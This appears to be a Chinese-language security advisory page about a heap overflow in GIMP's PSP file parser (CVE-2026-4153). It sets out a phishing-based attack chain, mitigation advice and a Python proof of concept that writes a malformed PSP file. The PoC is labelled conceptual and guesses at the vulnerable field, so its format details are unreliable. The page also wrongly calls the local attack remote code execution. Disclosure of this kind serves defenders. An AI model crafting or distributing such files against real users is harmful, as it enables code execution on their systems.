CVE-2026-4153 CVSS 7.8 高危

CVE-2026-4153 GIMP PSP文件解析堆溢出漏洞

披露日期: 2026-04-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4153

漏洞类型

堆溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GIMP

漏洞概述

该漏洞存在于GIMP的PSP文件解析功能中。由于在将用户提供的数据复制到基于堆的缓冲区之前，缺乏对数据长度的正确验证，导致发生堆缓冲区溢出。攻击者可以诱导用户打开特制的恶意PSP文件，从而触发该漏洞。成功利用此漏洞可能导致攻击者在目标系统上以当前进程的上下文执行任意代码。

技术细节

漏洞的根本原因是GIMP在解析PSP文件格式的特定部分（如某些块或属性头）时，未能正确检查输入数据的边界。当解析器读取到一个恶意构造的长度字段时，它会尝试将过量的数据复制到堆上分配的固定大小缓冲区中。这种溢出可以覆盖堆上的关键数据结构，如函数指针或邻近对象。由于攻击者可以控制输入数据的内容和长度，他们可以精心设计Payload来控制程序流，最终实现远程代码执行（RCE）。该漏洞利用需要用户交互，即受害者必须打开恶意文件。

攻击链分析

STEP 1

攻击者制作包含恶意Payload的特制PSP文件，该文件内部包含超长数据以触发堆溢出。

STEP 2

攻击者通过网络钓鱼邮件、恶意网站或文件共享平台将恶意PSP文件分发给目标用户。

STEP 3

受害者收到文件后，使用存在漏洞的GIMP版本打开该恶意PSP文件。

STEP 4

GIMP解析PSP文件时，由于未正确验证数据长度，将大量数据复制到堆缓冲区，导致溢出。

STEP 5

攻击者利用溢出覆盖关键内存区域（如返回地址或函数指针），劫持程序执行流。

STEP 6

在受害者的系统上以当前进程权限执行任意代码，可能导致系统被完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4153 (Conceptual)
# This script generates a malformed PSP file to trigger the heap overflow.

import struct

def create_malformed_psp(filename):
    # PSP file header signature
    signature = b'Paint Shop Pro Image File\n\x1a\x00\x00\x00\x01'
    
    # Create a malformed block header
    # Assuming the vulnerability is in parsing a block length field.
    # We set a large length value to trigger the overflow.
    block_id = b'GENR'  # Example block ID
    
    # Normal length might be small, we use a large value to overflow
    malicious_length = 0xFFFFFFFF  # Very large length
    
    # Construct the header
    header = signature + block_id + struct.pack('<I', malicious_length)
    
    # Padding to reach the copy point (conceptual)
    payload = b'A' * 100
    
    with open(filename, 'wb') as f:
        f.write(header + payload)

if __name__ == '__main__':
    create_malformed_psp('exploit.psp')
    print('Malformed PSP file generated: exploit.psp')

影响范围

GIMP (具体版本请参考官方GitLab提交 98cb1371)

防御指南

临时缓解措施

目前最佳的缓解措施是限制用户对PSP文件的访问权限，并部署邮件网关过滤可疑的PSP附件。建议尽快检查并更新GIMP至修复了该漏洞的版本（参考GitLab提交 98cb1371fd4e22cca75017ea3252dc32fc218712）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表